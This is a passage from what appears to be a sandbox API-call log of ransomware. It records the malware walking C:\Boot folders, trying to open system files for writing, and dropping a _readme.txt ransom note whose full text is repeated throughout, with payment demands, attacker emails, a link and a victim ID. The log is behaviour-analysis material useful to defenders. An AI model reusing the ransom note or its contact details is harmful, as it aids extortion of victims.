pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0187.969] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0187.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0187.970] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0187.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0187.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.971] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*" (normalized: "c:\\boot\\da-dk\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0187.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.971] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.971] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0187.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.972] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0187.972] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.973] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0187.973] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.973] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.973] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0187.973] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0187.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.973] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0187.974] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.974] PathFindFileNameW (pszPath="") returned="" [0187.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.974] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0187.974] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0187.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0187.974] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0187.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0187.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0187.975] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0187.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e765d0 [0187.976] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0187.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.977] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0187.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0187.977] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0187.977] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0187.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0187.978] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0187.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0187.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0187.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.979] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*" (normalized: "c:\\boot\\de-de\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0187.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.979] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.980] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0187.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.980] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0187.980] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0187.989] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.990] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.990] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.997] 